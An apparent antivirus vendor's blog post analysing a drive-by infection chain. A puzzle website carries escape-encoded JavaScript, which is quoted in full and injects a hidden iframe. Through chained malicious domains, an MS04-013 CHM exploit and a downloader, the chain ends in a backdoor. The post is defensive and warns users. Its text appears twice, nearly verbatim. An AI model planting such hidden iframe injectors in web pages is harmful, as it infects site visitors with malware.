Oct27 |
3:44 am (UTC-7) | by
Jhoevine Capicio (Threats Analyst) |
Mixed threats are becoming more and more common nowadays. Most of the times, users don’t even know what hit them until it’s too late. Just visit a site, which REALLY looks like a legitimate one by the way, and presto – you have your instant adwares, spywares, backdoors, trojans or even worms roaming free and undetected in your system!
We have reported many of these examples of what we may call as Mixed Threat Adventures or mal-Adventures in the past, but here’s one current example that is still out there in the wild, so to speak!
This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.
But by looking at the code of this would be “Normal Website”, I saw this – a javascript which is encoded using the escape command.
document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D
%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C
%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62
%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F
%69%66%72%61%6D%65%3E’));
which when unescaped exploits an iframe to load another website
http://www.pfl-enlarge.com.
This website in turn loads another site, http://www.britroadsters.com, using again the iframe exploit.
The http://www.britroadsters.com site checks for the browser application. If the browser is “Microsoft Internet Explorer” then it loads the file enter.php and if it’s not it loads the file all.php. It doesn’tt really matter however since both these files actually just load another website using again an iframe exploit which will lead to
http://www.secretadvise.biz/news.html.
Hehe… In the words of my TL, this is just like following the bouncing ball of malware.
So in the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a javascript (encoded with again the escape command) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named
“Style.css”.
Here is an image of the decoded script from news.html.
Voila! The exploit code can now be seen… and a mysterous style.css file…
From website links, now we go to files downloaded
Don’t be fooled by the extension – Style.css is actually a chm file which drops an exe file named open.exe. There you now we’re getting somewhere!:) hehe.. But that’s not where it ends…
The file open.exe is also just a downloader and downloads a file from
http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!
The files have been sent to the service team for signature generation and here’ss the reply. The files will be detected as such:
News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT
So let us review, just by visiting a site, a seemingly normal and non-malicious site, the system will be infected with 4 malwares. Plus there’s the added bonus of having a malicious user hack in to your system because of BKDR_HAXDOOR.CT!
So for those Net-Surfers out there, just keep in mind what sites you go into. Plus of course it’s always a good thing to have your systems patched and your pattern files updated.:)
We have reported many of these examples of what we may call as Mixed Threat Adventures or mal-Adventures in the past, but here’s one current example that is still out there in the wild, so to speak!
This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.
But by looking at the code of this would be “Normal Website”, I saw this – a javascript which is encoded using the escape command.
document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D
%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C
%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62
%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F
%69%66%72%61%6D%65%3E’));
which when unescaped exploits an iframe to load another website
http://www.pfl-enlarge.com.
This website in turn loads another site, http://www.britroadsters.com, using again the iframe exploit.
The http://www.britroadsters.com site checks for the browser application. If the browser is “Microsoft Internet Explorer” then it loads the file enter.php and if it’s not it loads the file all.php. It doesn’tt really matter however since both these files actually just load another website using again an iframe exploit which will lead to
http://www.secretadvise.biz/news.html.
Hehe… In the words of my TL, this is just like following the bouncing ball of malware.
So in the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a javascript (encoded with again the escape command) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named
“Style.css”.
Here is an image of the decoded script from news.html.
Voila! The exploit code can now be seen… and a mysterous style.css file…
From website links, now we go to files downloaded
Don’t be fooled by the extension – Style.css is actually a chm file which drops an exe file named open.exe. There you now we’re getting somewhere!:) hehe.. But that’s not where it ends…
The file open.exe is also just a downloader and downloads a file from
http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!
The files have been sent to the service team for signature generation and here’ss the reply. The files will be detected as such:
News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT
So let us review, just by visiting a site, a seemingly normal and non-malicious site, the system will be infected with 4 malwares. Plus there’s the added bonus of having a malicious user hack in to your system because of BKDR_HAXDOOR.CT!
So for those Net-Surfers out there, just keep in mind what sites you go into. Plus of course it’s always a good thing to have your systems patched and your pattern files updated.:)
Share this article |
 |
        |
